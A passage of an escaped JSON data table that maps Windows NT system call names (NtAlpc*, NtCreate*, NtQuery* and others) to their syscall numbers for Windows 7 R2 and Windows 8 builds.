\"NtAlpcDeletePortSection\": 124, \"NtAlpcDeleteResourceReserve\": 125, \"NtAlpcDeleteSectionView\": 126, \"NtAlpcDeleteSecurityContext\": 127, \"NtAlpcDisconnectPort\": 128, \"NtAlpcImpersonateClientOfPort\": 129, \"NtAlpcOpenSenderProcess\": 130, \"NtAlpcOpenSenderThread\": 131, \"NtAlpcQueryInformation\": 132, \"NtAlpcQueryInformationMessage\": 133, \"NtAlpcRevokeSecurityContext\": 134, \"NtAlpcSendWaitReceivePort\": 135, \"NtAlpcSetInformation\": 136, \"NtAreMappedFilesTheSame\": 137, \"NtAssignProcessToJobObject\": 138, \"NtAssociateWaitCompletionPacket\": 139, \"NtCancelIoFileEx\": 140, \"NtCancelSynchronousIoFile\": 141, \"NtCancelWaitCompletionPacket\": 142, \"NtCommitComplete\": 143, \"NtCommitEnlistment\": 144, \"NtCommitTransaction\": 145, \"NtCompactKeys\": 146, \"NtCompareTokens\": 147, \"NtCompleteConnectPort\": 148, \"NtCompressKey\": 149, \"NtConnectPort\": 150, \"NtCreateDebugObject\": 151, \"NtCreateDirectoryObject\": 152, \"NtCreateDirectoryObjectEx\": 153, \"NtCreateEnlistment\": 154, \"NtCreateEventPair\": 155, \"NtCreateIRTimer\": 156, \"NtCreateIoCompletion\": 157, \"NtCreateJobObject\": 158, \"NtCreateJobSet\": 159, \"NtCreateKeyTransacted\": 160, \"NtCreateKeyedEvent\": 161, \"NtCreateLowBoxToken\": 162, \"NtCreateMailslotFile\": 163, \"NtCreateMutant\": 164, \"NtCreateNamedPipeFile\": 165, \"NtCreatePagingFile\": 166, \"NtCreatePort\": 167, \"NtCreatePrivateNamespace\": 168, \"NtCreateProcess\": 169, \"NtCreateProfile\": 170, \"NtCreateProfileEx\": 171, \"NtCreateResourceManager\": 172, \"NtCreateSemaphore\": 173, \"NtCreateSymbolicLinkObject\": 174, \"NtCreateThreadEx\": 175, \"NtCreateTimer\": 176, \"NtCreateToken\": 177, \"NtCreateTokenEx\": 178, \"NtCreateTransaction\": 179, \"NtCreateTransactionManager\": 180, \"NtCreateUserProcess\": 181, \"NtCreateWaitCompletionPacket\": 182, \"NtCreateWaitablePort\": 183, \"NtCreateWnfStateName\": 184, \"NtCreateWorkerFactory\": 185, \"NtDebugActiveProcess\": 186, \"NtDebugContinue\": 187, \"NtDeleteAtom\": 188, \"NtDeleteBootEntry\": 189, \"NtDeleteDriverEntry\": 190, \"NtDeleteFile\": 191, \"NtDeleteKey\": 192, \"NtDeleteObjectAuditAlarm\": 193, \"NtDeletePrivateNamespace\": 194, \"NtDeleteValueKey\": 195, \"NtDeleteWnfStateData\": 196, \"NtDeleteWnfStateName\": 197, \"NtDisableLastKnownGood\": 198, \"NtDisplayString\": 199, \"NtDrawText\": 200, \"NtEnableLastKnownGood\": 201, \"NtEnumerateBootEntries\": 202, \"NtEnumerateDriverEntries\": 203, \"NtEnumerateSystemEnvironmentValuesEx\": 204, \"NtEnumerateTransactionObject\": 205, \"NtExtendSection\": 206, \"NtFilterBootOption\": 207, \"NtFilterToken\": 208, \"NtFilterTokenEx\": 209, \"NtFlushBuffersFileEx\": 210, \"NtFlushInstallUILanguage\": 211, \"NtFlushInstructionCache\": 212, \"NtFlushKey\": 213, \"NtFlushProcessWriteBuffers\": 214, \"NtFlushVirtualMemory\": 215, \"NtFlushWriteBuffer\": 216, \"NtFreeUserPhysicalPages\": 217, \"NtFreezeRegistry\": 218, \"NtFreezeTransactions\": 219, \"NtGetCachedSigningLevel\": 220, \"NtGetContextThread\": 221, \"NtGetCurrentProcessorNumber\": 222, \"NtGetDevicePowerState\": 223, \"NtGetMUIRegistryInfo\": 224, \"NtGetNextProcess\": 225, \"NtGetNextThread\": 226, \"NtGetNlsSectionPtr\": 227, \"NtGetNotificationResourceManager\": 228, \"NtGetWriteWatch\": 229, \"NtImpersonateAnonymousToken\": 230, \"NtImpersonateThread\": 231, \"NtInitializeNlsFiles\": 232, \"NtInitializeRegistry\": 233, \"NtInitiatePowerAction\": 234, \"NtIsSystemResumeAutomatic\": 235, \"NtIsUILanguageComitted\": 236, \"NtListenPort\": 237, \"NtLoadDriver\": 238, \"NtLoadKey\": 239, \"NtLoadKey2\": 240, \"NtLoadKeyEx\": 241, \"NtLockFile\": 242, \"NtLockProductActivationKeys\": 243, \"NtLockRegistryKey\": 244, \"NtLockVirtualMemory\": 245, \"NtMakePermanentObject\": 246, \"NtMakeTemporaryObject\": 247, \"NtMapCMFModule\": 248, \"NtMapUserPhysicalPages\": 249, \"NtModifyBootEntry\": 250, \"NtModifyDriverEntry\": 251, \"NtNotifyChangeDirectoryFile\": 252, \"NtNotifyChangeKey\": 253, \"NtNotifyChangeMultipleKeys\": 254, \"NtNotifyChangeSession\": 255, \"NtOpenEnlistment\": 256, \"NtOpenEventPair\": 257, \"NtOpenIoCompletion\": 258, \"NtOpenJobObject\": 259, \"NtOpenKeyEx\": 260, \"NtOpenKeyTransacted\": 261, \"NtOpenKeyTransactedEx\": 262, \"NtOpenKeyedEvent\": 263, \"NtOpenMutant\": 264, \"NtOpenObjectAuditAlarm\": 265, \"NtOpenPrivateNamespace\": 266, \"NtOpenProcessToken\": 267, \"NtOpenResourceManager\": 268, \"NtOpenSemaphore\": 269, \"NtOpenSession\": 270, \"NtOpenSymbolicLinkObject\": 271, \"NtOpenThread\": 272, \"NtOpenTimer\": 273, \"NtOpenTransaction\": 274, \"NtOpenTransactionManager\": 275, \"NtPlugPlayControl\": 276, \"NtPrePrepareComplete\": 277, \"NtPrePrepareEnlistment\": 278, \"NtPrepareComplete\": 279, \"NtPrepareEnlistment\": 280, \"NtPrivilegeCheck\": 281, \"NtPrivilegeObjectAuditAlarm\": 282, \"NtPrivilegedServiceAuditAlarm\": 283, \"NtPropagationComplete\": 284, \"NtPropagationFailed\": 285, \"NtPulseEvent\": 286, \"NtQueryBootEntryOrder\": 287, \"NtQueryBootOptions\": 288, \"NtQueryDebugFilterState\": 289, \"NtQueryDirectoryObject\": 290, \"NtQueryDriverEntryOrder\": 291, \"NtQueryEaFile\": 292, \"NtQueryFullAttributesFile\": 293, \"NtQueryInformationAtom\": 294, \"NtQueryInformationEnlistment\": 295, \"NtQueryInformationJobObject\": 296, \"NtQueryInformationPort\": 297, \"NtQueryInformationResourceManager\": 298, \"NtQueryInformationTransaction\": 299, \"NtQueryInformationTransactionManager\": 300, \"NtQueryInformationWorkerFactory\": 301, \"NtQueryInstallUILanguage\": 302, \"NtQueryIntervalProfile\": 303, \"NtQueryIoCompletion\": 304, \"NtQueryLicenseValue\": 305, \"NtQueryMultipleValueKey\": 306, \"NtQueryMutant\": 307, \"NtQueryOpenSubKeys\": 308, \"NtQueryOpenSubKeysEx\": 309, \"NtQueryPortInformationProcess\": 310, \"NtQueryQuotaInformationFile\": 311, \"NtQuerySecurityAttributesToken\": 312, \"NtQuerySecurityObject\": 313, \"NtQuerySemaphore\": 314, \"NtQuerySymbolicLinkObject\": 315, \"NtQuerySystemEnvironmentValue\": 316, \"NtQuerySystemEnvironmentValueEx\": 317, \"NtQuerySystemInformationEx\": 318, \"NtQueryTimerResolution\": 319, \"NtQueryWnfStateData\": 320, \"NtQueryWnfStateNameInformation\": 321, \"NtQueueApcThreadEx\": 322, \"NtRaiseException\": 323, \"NtRaiseHardError\": 324, \"NtReadOnlyEnlistment\": 325, \"NtRecoverEnlistment\": 326, \"NtRecoverResourceManager\": 327, \"NtRecoverTransactionManager\": 328, \"NtRegisterProtocolAddressInformation\": 329, \"NtRegisterThreadTerminatePort\": 330, \"NtReleaseKeyedEvent\": 331, \"NtReleaseWorkerFactoryWorker\": 332, \"NtRemoveIoCompletionEx\": 333, \"NtRemoveProcessDebug\": 334, \"NtRenameKey\": 335, \"NtRenameTransactionManager\": 336, \"NtReplaceKey\": 337, \"NtReplacePartitionUnit\": 338, \"NtReplyWaitReplyPort\": 339, \"NtRequestPort\": 340, \"NtResetEvent\": 341, \"NtResetWriteWatch\": 342, \"NtRestoreKey\": 343, \"NtResumeProcess\": 344, \"NtRollbackComplete\": 345, \"NtRollbackEnlistment\": 346, \"NtRollbackTransaction\": 347, \"NtRollforwardTransactionManager\": 348, \"NtSaveKey\": 349, \"NtSaveKeyEx\": 350, \"NtSaveMergedKeys\": 351, \"NtSecureConnectPort\": 352, \"NtSerializeBoot\": 353, \"NtSetBootEntryOrder\": 354, \"NtSetBootOptions\": 355, \"NtSetCachedSigningLevel\": 356, \"NtSetContextThread\": 357, \"NtSetDebugFilterState\": 358, \"NtSetDefaultHardErrorPort\": 359, \"NtSetDefaultLocale\": 360, \"NtSetDefaultUILanguage\": 361, \"NtSetDriverEntryOrder\": 362, \"NtSetEaFile\": 363, \"NtSetHighEventPair\": 364, \"NtSetHighWaitLowEventPair\": 365, \"NtSetIRTimer\": 366, \"NtSetInformationDebugObject\": 367, \"NtSetInformationEnlistment\": 368, \"NtSetInformationJobObject\": 369, \"NtSetInformationKey\": 370, \"NtSetInformationResourceManager\": 371, \"NtSetInformationToken\": 372, \"NtSetInformationTransaction\": 373, \"NtSetInformationTransactionManager\": 374, \"NtSetInformationVirtualMemory\": 375, \"NtSetInformationWorkerFactory\": 376, \"NtSetIntervalProfile\": 377, \"NtSetIoCompletion\": 378, \"NtSetIoCompletionEx\": 379, \"NtSetLdtEntries\": 380, \"NtSetLowEventPair\": 381, \"NtSetLowWaitHighEventPair\": 382, \"NtSetQuotaInformationFile\": 383, \"NtSetSecurityObject\": 384, \"NtSetSystemEnvironmentValue\": 385, \"NtSetSystemEnvironmentValueEx\": 386, \"NtSetSystemInformation\": 387, \"NtSetSystemPowerState\": 388, \"NtSetSystemTime\": 389, \"NtSetThreadExecutionState\": 390, \"NtSetTimerEx\": 391, \"NtSetTimerResolution\": 392, \"NtSetUuidSeed\": 393, \"NtSetVolumeInformationFile\": 394, \"NtShutdownSystem\": 395, \"NtShutdownWorkerFactory\": 396, \"NtSignalAndWaitForSingleObject\": 397, \"NtSinglePhaseReject\": 398, \"NtStartProfile\": 399, \"NtStopProfile\": 400, \"NtSubscribeWnfStateChange\": 401, \"NtSuspendProcess\": 402, \"NtSuspendThread\": 403, \"NtSystemDebugControl\": 404, \"NtTerminateJobObject\": 405, \"NtTestAlert\": 406, \"NtThawRegistry\": 407, \"NtThawTransactions\": 408, \"NtTraceControl\": 409, \"NtTranslateFilePath\": 410, \"NtUmsThreadYield\": 411, \"NtUnloadDriver\": 412, \"NtUnloadKey\": 413, \"NtUnloadKey2\": 414, \"NtUnloadKeyEx\": 415, \"NtUnlockFile\": 416, \"NtUnlockVirtualMemory\": 417, \"NtUnmapViewOfSectionEx\": 418, \"NtUnsubscribeWnfStateChange\": 419, \"NtUpdateWnfStateData\": 420, \"NtVdmControl\": 421, \"NtWaitForAlertByThreadId\": 422, \"NtWaitForDebugEvent\": 423, \"NtWaitForKeyedEvent\": 424, \"NtWaitForWnfNotifications\": 425, \"NtWaitForWorkViaWorkerFactory\": 426, \"NtWaitHighEventPair\": 427, \"NtWaitLowEventPair\": 428}, \"R2\": {\"NtWorkerFactoryWorkerReady\": 0, \"NtAcceptConnectPort\": 1, \"NtMapUserPhysicalPagesScatter\": 2, \"NtWaitForSingleObject\": 3, \"NtCallbackReturn\": 4, \"NtReadFile\": 5, \"NtDeviceIoControlFile\": 6, \"NtWriteFile\": 7, \"NtRemoveIoCompletion\": 8, \"NtReleaseSemaphore\": 9, \"NtReplyWaitReceivePort\": 10, \"NtReplyPort\": 11, \"NtSetInformationThread\": 12, \"NtSetEvent\": 13, \"NtClose\": 14, \"NtQueryObject\": 15, \"NtQueryInformationFile\": 16, \"NtOpenKey\": 17, \"NtEnumerateValueKey\": 18, \"NtFindAtom\": 19, \"NtQueryDefaultLocale\": 20, \"NtQueryKey\": 21, \"NtQueryValueKey\": 22, \"NtAllocateVirtualMemory\": 23, \"NtQueryInformationProcess\": 24, \"NtWaitForMultipleObjects32\": 25, \"NtWriteFileGather\": 26, \"NtSetInformationProcess\": 27, \"NtCreateKey\": 28, \"NtFreeVirtualMemory\": 29, \"NtImpersonateClientOfPort\": 30, \"NtReleaseMutant\": 31, \"NtQueryInformationToken\": 32, \"NtRequestWaitReplyPort\": 33, \"NtQueryVirtualMemory\": 34, \"NtOpenThreadToken\": 35, \"NtQueryInformationThread\": 36, \"NtOpenProcess\": 37, \"NtSetInformationFile\": 38, \"NtMapViewOfSection\": 39, \"NtAccessCheckAndAuditAlarm\": 40, \"NtUnmapViewOfSection\": 41, \"NtReplyWaitReceivePortEx\": 42, \"NtTerminateProcess\": 43, \"NtSetEventBoostPriority\": 44, \"NtReadFileScatter\": 45, \"NtOpenThreadTokenEx\": 46, \"NtOpenProcessTokenEx\": 47, \"NtQueryPerformanceCounter\": 48, \"NtEnumerateKey\": 49, \"NtOpenFile\": 50, \"NtDelayExecution\": 51, \"NtQueryDirectoryFile\": 52, \"NtQuerySystemInformation\": 53, \"NtOpenSection\": 54, \"NtQueryTimer\": 55, \"NtFsControlFile\": 56, \"NtWriteVirtualMemory\": 57, \"NtCloseObjectAuditAlarm\": 58, \"NtDuplicateObject\": 59, \"NtQueryAttributesFile\": 60, \"NtClearEvent\": 61, \"NtReadVirtualMemory\": 62, \"NtOpenEvent\": 63, \"NtAdjustPrivilegesToken\": 64, \"NtDuplicateToken\": 65, \"NtContinue\": 66, \"NtQueryDefaultUILanguage\": 67, \"NtQueueApcThread\": 68, \"NtYieldExecution\": 69, \"NtAddAtom\": 70, \"NtCreateEvent\": 71, \"NtQueryVolumeInformationFile\": 72, \"NtCreateSection\": 73, \"NtFlushBuffersFile\": 74, \"NtApphelpCacheControl\": 75, \"NtCreateProcessEx\": 76, \"NtCreateThread\": 77, \"NtIsProcessInJob\": 78, \"NtProtectVirtualMemory\": 79, \"NtQuerySection\": 80, \"NtResumeThread\": 81, \"NtTerminateThread\": 82, \"NtReadRequestData\": 83, \"NtCreateFile\": 84, \"NtQueryEvent\": 85, \"NtWriteRequestData\": 86, \"NtOpenDirectoryObject\": 87, \"NtAccessCheckByTypeAndAuditAlarm\": 88, \"NtQuerySystemTime\": 89, \"NtWaitForMultipleObjects\": 90, \"NtSetInformationObject\": 91, \"NtCancelIoFile\": 92, \"NtTraceEvent\": 93, \"NtPowerInformation\": 94, \"NtSetValueKey\": 95, \"NtCancelTimer\": 96, \"NtSetTimer\": 97, \"NtAccessCheck\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 103, \"NtAddBootEntry\": 104, \"NtAddDriverEntry\": 105, \"NtAdjustGroupsToken\": 106, \"NtAdjustTokenClaimsAndDeviceGroups\": 107, \"NtAlertResumeThread\": 108, \"NtAlertThread\": 109, \"NtAlertThreadByThreadId\": 110, \"NtAllocateLocallyUniqueId\": 111, \"NtAllocateReserveObject\": 112, \"NtAllocateUserPhysicalPages\": 113, \"NtAllocateUuids\": 114, \"NtAlpcAcceptConnectPort\": 115, \"NtAlpcCancelMessage\": 116, \"NtAlpcConnectPort\": 117, \"NtAlpcConnectPortEx\": 118, \"NtAlpcCreatePort\": 119, \"NtAlpcCreatePortSection\": 120, \"NtAlpcCreateResourceReserve\": 121, \"NtAlpcCreateSectionView\": 122, \"NtAlpcCreateSecurityContext\": 123, \"NtAlpcDeletePortSection\": 124, \"NtAlpcDeleteResourceReserve\": 125, \"NtAlpcDeleteSectionView\": 126, \"NtAlpcDeleteSecurityContext\": 127, \"NtAlpcDisconnectPort\": 128, \"NtAlpcImpersonateClientOfPort\": 129, \"NtAlpcOpenSenderProcess\": 130, \"NtAlpcOpenSenderThread\": 131, \"NtAlpcQueryInformation\": 132, \"NtAlpcQueryInformationMessage\": 133, \"NtAlpcRevokeSecurityContext\": 134, \"NtAlpcSendWaitReceivePort\": 135, \"NtAlpcSetInformation\": 136, \"NtAreMappedFilesTheSame\": 137, \"NtAssignProcessToJobObject\": 138, \"NtAssociateWaitCompletionPacket\": 139, \"NtCancelIoFileEx\": 140, \"NtCancelSynchronousIoFile\": 141, \"NtCancelTimer2\": 142, \"NtCancelWaitCompletionPacket\": 143, \"NtCommitComplete\": 144, \"NtCommitEnlistment\": 145, \"NtCommitTransaction\": 146, \"NtCompactKeys\": 147, \"NtCompareTokens\": 148, \"NtCompleteConnectPort\": 149, \"NtCompressKey\": 150, \"NtConnectPort\": 151, \"NtCreateDebugObject\": 152, \"NtCreateDirectoryObject\": 153, \"NtCreateDirectoryObjectEx\": 154, \"NtCreateEnlistment\": 155, \"NtCreateEventPair\": 156, \"NtCreateIRTimer\": 157, \"NtCreateIoCompletion\": 158, \"NtCreateJobObject\": 159, \"NtCreateJobSet\": 160, \"NtCreateKeyTransacted\": 161, \"NtCreateKeyedEvent\": 162, \"NtCreateLowBoxToken\": 163, \"NtCreateMailslotFile\": 164, \"NtCreateMutant\": 165, \"NtCreateNamedPipeFile\": 166, \"NtCreatePagingFile\": 167, \"NtCreatePort\": 168, \"NtCreatePrivateNamespace\": 169, \"NtCreateProcess\": 170, \"NtCreateProfile\": 171, \"NtCreateProfileEx\": 172, \"NtCreateResourceManager\": 173, \"NtCreateSemaphore\": 174, \"NtCreateSymbolicLinkObject\": 175, \"NtCreateThreadEx\": 176, \"NtCreateTimer\": 177, \"NtCreateTimer2\": 178, \"NtCreateToken\": 179, \"NtCreateTokenEx\": 180, \"NtCreateTransaction\": 181, \"NtCreateTransactionManager\": 182, \"NtCreateUserProcess\": 183, \"NtCreateWaitCompletionPacket\": 184, \"NtCreateWaitablePort\": 185, \"NtCreateWnfStateName\": 186, \"NtCreateWorkerFactory\": 187, \"NtDebugActiveProcess\": 188, \"NtDebugContinue\": 189, \"NtDeleteAtom\": 190, \"NtDeleteBootEntry\": 191, \"NtDeleteDriverEntry\": 192, \"NtDeleteFile\": 193, \"NtDeleteKey\": 194, \"NtDeleteObjectAuditAlarm\": 195, \"NtDeletePrivateNamespace\": 196, \"NtDeleteValueKey\": 197, \"NtDeleteWnfStateData\": 198, \"NtDeleteWnfStateName\": 199, \"NtDisableLastKnownGood\": 200, \"NtDisplayString\": 201, \"NtDrawText\": 202, \"NtEnableLastKnownGood\": 203, \"NtEnumerateBootEntries\": 204, \"NtEnumerateDriverEntries\": 205, \"NtEnumerateSystemEnvironmentValuesEx\": 206, \"NtEnumerateTransactionObject\": 207, \"NtExtendSection\": 208, \"NtFilterBootOption\": 209, \"NtFilterToken\": 210, \"NtFilterTokenEx\": 211, \"NtFlushBuffersFileEx\": 212, \"NtFlushInstallUILanguage\": 213, \"NtFlushInstructionCache\": 214, \"NtFlushKey\": 215, \"NtFlushProcessWriteBuffers\": 216, \"NtFlushVirtualMemory\": 217, \"NtFlushWriteBuffer\": 218, \"NtFreeUserPhysicalPages\": 219, \"NtFreezeRegistry\": 220, \"NtFreezeTransactions\": 221, \"NtGetCachedSigningLevel\": 222, \"NtGetCompleteWnfStateSubscription\": 223, \"NtGetContextThread\": 224, \"NtGetCurrentProcessorNumber\": 225, \"NtGetDevicePowerState\": 226, \"NtGetMUIRegistryInfo\": 227, \"NtGetNextProcess\": 228, \"NtGetNextThread\": 229, \"NtGetNlsSectionPtr\": 230, \"NtGetNotificationResourceManager\": 231, \"NtGetWriteWatch\": 232, \"NtImpersonateAnonymousToken\": 233, \"NtImpersonateThread\": 234, \"NtInitializeNlsFiles\": 235, \"NtInitializeRegistry\": 236, \"NtInitiatePowerAction\": 237, \"NtIsSystemResumeAutomatic\": 238, \"NtIsUILanguageComitted\": 239, \"NtListenPort\": 240, \"NtLoadDriver\": 241, \"NtLoadKey\": 242, \"NtLoadKey2\": 243, \"NtLoadKeyEx\": 244, \"NtLockFile\": 245, \"NtLockProductActivationKeys\": 246, \"NtLockRegistryKey\": 247, \"NtLockVirtualMemory\": 248, \"NtMakePermanentObject\": 249, \"NtMakeTemporaryObject\": 250, \"NtMapCMFModule\": 251, \"NtMapUserPhysicalPages\": 252, \"NtModifyBootEntry\": 253, \"NtModifyDriverEntry\": 254, \"NtNotifyChangeDirectoryFile\": 255, \"NtNotifyChangeKey\": 256, \"NtNotifyChangeMultipleKeys\": 257, \"NtNotifyChangeSession\": 258, \"NtOpenEnlistment\": 259, \"NtOpenEventPair\": 260, \"NtOpenIoCompletion\": 261, \"NtOpenJobObject\": 262, \"NtOpenKeyEx\": 263, \"NtOpenKeyTransacted\": 264, \"NtOpenKeyTransactedEx\": 265, \"NtOpenKeyedEvent\": 266, \"NtOpenMutant\": 267, \"NtOpenObjectAuditAlarm\": 268, \"NtOpenPrivateNamespace\": 269, \"NtOpenProcessToken\": 270, \"NtOpenResourceManager\": 271, \"NtOpenSemaphore\": 272, \"NtOpenSession\": 273, \"NtOpenSymbolicLinkObject\": 274, \"NtOpenThread\": 275, \"NtOpenTimer\": 276, \"NtOpenTransaction\": 277, \"NtOpenTransactionManager\": 278, \"NtPlugPlayControl\": 279, \"NtPrePrepareComplete\": 280, \"NtPrePrepareEnlistment\": 281, \"NtPrepareComplete\": 282, \"NtPrepareEnlistment\": 283, \"NtPrivilegeCheck\": 284, \"NtPrivilegeObjectAuditAlarm\": 285, \"NtPrivilegedServiceAuditAlarm\": 286, \"NtPropagationComplete\": 287, \"NtPropagationFailed\": 288, \"NtPulseEvent\": 289, \"NtQueryBootEntryOrder\": 290, \"NtQueryBootOptions\": 291, \"NtQueryDebugFilterState\": 292, \"NtQueryDirectoryObject\": 293, \"NtQueryDriverEntryOrder\": 294, \"NtQueryEaFile\": 295, \"NtQueryFullAttributesFile\": 296, \"NtQueryInformationAtom\": 297, \"NtQueryInformationEnlistment\": 298, \"NtQueryInformationJobObject\": 299, \"NtQueryInformationPort\": 300, \"NtQueryInformationResourceManager\": 301, \"NtQueryInformationTransaction\": 302, \"NtQueryInformationTransactionManager\": 303, \"NtQueryInformationWorkerFactory\": 304, \"NtQueryInstallUILanguage\": 305, \"NtQueryIntervalProfile\": 306, \"NtQueryIoCompletion\": 307, \"NtQueryLicenseValue\": 308, \"NtQueryMultipleValueKey\": 309, \"NtQueryMutant\": 310, \"NtQueryOpenSubKeys\": 311, \"NtQueryOpenSubKeysEx\": 312, \"NtQueryPortInformationProcess\": 313, \"NtQueryQuotaInformationFile\": 314, \"NtQuerySecurityAttributesToken\": 315, \"NtQuerySecurityObject\": 316, \"NtQuerySemaphore\": 317, \"NtQuerySymbolicLinkObject\": 318, \"NtQuerySystemEnvironmentValue\": 319, \"NtQuerySystemEnvironmentValueEx\": 320, \"NtQuerySystemInformationEx\": 321, \"NtQueryTimerResolution\": 322, \"NtQueryWnfStateData\": 323, \"NtQueryWnfStateNameInformation\": 324, \"NtQueueApcThreadEx\": 325, \"NtRaiseException\": 326, \"NtRaiseHardError\": 327, \"NtReadOnlyEnlistment\": 328, \"NtRecoverEnlistment\": 329, \"NtRecoverResourceManager\": 330, \"NtRecoverTransactionManager\": 331, \"NtRegisterProtocolAddressInformation\": 332, \"NtRegisterThreadTerminatePort\": 333, \"NtReleaseKeyedEvent\": 334, \"NtReleaseWorkerFactoryWorker\": 335, \"NtRemoveIoCompletionEx\": 336, \"NtRemoveProcessDebug\": 337, \"NtRenameKey\": 338, \"NtRenameTransactionManager\": 339, \"NtReplaceKey\": 340, \"NtReplacePartitionUnit\": 341, \"NtReplyWaitReplyPort\": 342, \"NtRequestPort\": 343, \"NtResetEvent\": 344, \"NtResetWriteWatch\": 345, \"NtRestoreKey\": 346, \"NtResumeProcess\": 347, \"NtRollbackComplete\": 348, \"NtRollbackEnlistment\": 349, \"NtRollbackTransaction\": 350, \"NtRollforwardTransactionManager\": 351, \"NtSaveKey\": 352, \"NtSaveKeyEx\": 353, \"NtSaveMergedKeys\": 354, \"NtSecureConnectPort\": 355, \"NtSerializeBoot\": 356, \"NtSetBootEntryOrder\": 357, \"NtSetBootOptions\": 358, \"NtSetCachedSigningLevel\": 359, \"NtSetContextThread\": 360, \"NtSetDebugFilterState\": 361, \"NtSetDefaultHardErrorPort\": 362, \"NtSetDefaultLocale\": 363, \"NtSetDefaultUILanguage\": 364, \"NtSetDriverEntryOrder\": 365, \"NtSetEaFile\": 366, \"NtSetHighEventPair\": 367, \"NtSetHighWaitLowEventPair\": 368, \"NtSetIRTimer\": 369, \"NtSetInformationDebugObject\": 370, \"NtSetInformationEnlistment\": 371, \"NtSetInformationJobObject\": 372, \"NtSetInformationKey\": 373, \"NtSetInformationResourceManager\": 374, \"NtSetInformationToken\": 375, \"NtSetInformationTransaction\": 376, \"NtSetInformationTransactionManager\": 377, \"NtSetInformationVirtualMemory\": 378, \"NtSetInformationWorkerFactory\": 379, \"NtSetIntervalProfile\": 380, \"NtSetIoCompletion\": 381, \"NtSetIoCompletionEx\": 382, \"NtSetLdtEntries\": 383, \"NtSetLowEventPair\": 384, \"NtSetLowWaitHighEventPair\": 385, \"NtSetQuotaInformationFile\": 386, \"NtSetSecurityObject\": 387, \"NtSetSystemEnvironmentValue\": 388, \"NtSetSystemEnvironmentValueEx\": 389, \"NtSetSystemInformation\": 390, \"NtSetSystemPowerState\": 391, \"NtSetSystemTime\": 392, \"NtSetThreadExecutionState\": 393, \"NtSetTimer2\": 394, \"NtSetTimerEx\": 395, \"NtSetTimerResolution\": 396, \"NtSetUuidSeed\": 397, \"NtSetVolumeInformationFile\": 398, \"NtSetWnfProcessNotificationEvent\": 399, \"NtShutdownSystem\": 400, \"NtShutdownWorkerFactory\": 401, \"NtSignalAndWaitForSingleObject\": 402, \"NtSinglePhaseReject\": 403, \"NtStartProfile\": 404, \"NtStopProfile\": 405, \"NtSubscribeWnfStateChange\": 406, \"NtSuspendProcess\": 407, \"NtSuspendThread\": 408, \"NtSystemDebugControl\": 409, \"NtTerminateJobObject\": 410, \"NtTestAlert\": 411, \"NtThawRegistry\": 412, \"NtThawTransactions\": 413, \"NtTraceControl\": 414, \"NtTranslateFilePath\": 415, \"NtUmsThreadYield\": 416, \"NtUnloadDriver\": 417, \"NtUnloadKey\": 418, \"NtUnloadKey2\": 419, \"NtUnloadKeyEx\": 420, \"NtUnlockFile\": 421, \"NtUnlockVirtualMemory\": 422, \"NtUnmapViewOfSectionEx\": 423, \"NtUnsubscribeWnfStateChange\": 424, \"NtUpdateWnfStateData\": 425, \"NtVdmControl\": 426, \"NtWaitForAlertByThreadId\": 427, \"NtWaitForDebugEvent\": 428, \"NtWaitForKeyedEvent\": 429, \"NtWaitForWorkViaWorkerFactory\": 430, \"NtWaitHighEventPair\": 431, \"NtWaitLowEventPair\": 432}}, \"Windows 8\": {\"8.0\": {\"NtWorkerFactoryWorkerReady\": 0, \"NtMapUserPhysicalPagesScatter\": 1, \"NtWaitForSingleObject\": 2, \"NtCallbackReturn\": 3, \"NtReadFile\": 4, \"NtDeviceIoControlFile\": 5, \"NtWriteFile\": 6, \"NtRemoveIoCompletion\": 7, \"NtReleaseSemaphore\": 8, \"NtReplyWaitReceivePort\": 9, \"NtReplyPort\": 10, \"NtSetInformationThread\": 11, \"NtSetEvent\": 12, \"NtClose\": 13, \"NtQueryObject\": 14, \"NtQueryInformationFile\": 15, \"NtOpenKey\": 16, \"NtEnumerateValueKey\": 17, \"NtFindAtom\": 18, \"NtQueryDefaultLocale\": 19, \"NtQueryKey\": 20, \"NtQueryValueKey\": 21, \"NtAllocateVirtualMemory\": 22, \"NtQueryInformationProcess\": 23, \"NtWaitForMultipleObjects32\": 24, \"NtWriteFileGather\": 25, \"NtSetInformationProcess\": 26, \"NtCreateKey\": 27, \"NtFreeVirtualMemory\": 28, \"NtImpersonateClientOfPort\": 29, \"NtReleaseMutant\": 30, \"NtQueryInformationToken\": 31, \"NtRequestWaitReplyPort\": 32, \"NtQueryVirtualMemory\": 33, \"NtOpenThreadToken\": 34, \"NtQueryInformationThread\": 35, \"NtOpenProcess\": 36, \"NtSetInformationFile\": 37, \"NtMapViewOfSection\": 38, \"NtAccessCheckAndAuditAlarm\": 39, \"NtUnmapViewOfSection\": 40, \"NtReplyWaitReceivePortEx\": 41, \"NtTerminateProcess\": 42, \"NtSetEventBoostPriority\": 43, \"NtReadFileScatter\": 44, \"NtOpenThreadTokenEx\": 45, \"NtOpenProcessTokenEx\": 46, \"NtQueryPerformanceCounter\": 47, \"NtEnumerateKey\": 48, \"NtOpenFile\": 49, \"NtDelayExecution\": 50, \"NtQueryDirectoryFile\": 51, \"NtQuerySystemInformation\": 52, \"NtOpenSection\": 53, \"NtQueryTimer\": 54, \"NtFsControlFile\": 55, \"NtWriteVirtualMemory\": 56, \"NtCloseObjectAuditAlarm\": 57, \"NtDuplicateObject\": 58, \"NtQueryAttributesFile\": 59, \"NtClearEvent\": 60, \"NtReadVirtualMemory\": 61, \"NtOpenEvent\": 62, \"NtAdjustPrivilegesToken\": 63, \"NtDuplicateToken\": 64, \"NtContinue\": 65, \"NtQueryDefaultUILanguage\": 66, \"NtQueueApcThread\": 67, \"NtYieldExecution\": 68, \"NtAddAtom\": 69, \"NtCreateEvent\": 70, \"NtQueryVolumeInformationFile\": 71, \"NtCreateSection\": 72, \"NtFlushBuffersFile\": 73, \"NtApphelpCacheControl\": 74, \"NtCreateProcessEx\": 75, \"NtCreateThread\": 76, \"NtIsProcessInJob\": 77, \"NtProtectVirtualMemory\": 78, \"NtQuerySection\": 79, \"NtResumeThread\": 80, \"NtTerminateThread\": 81, \"NtReadRequestData\": 82, \"NtCreateFile\": 83, \"NtQueryEvent\": 84, \"NtWriteRequestData\": 85, \"NtOpenDirectoryObject\": 86, \"NtAccessCheckByTypeAndAuditAlarm\": 87, \"NtQuerySystemTime\": 88, \"NtWaitForMultipleObjects\": 89, \"NtSetInformationObject\": 90, 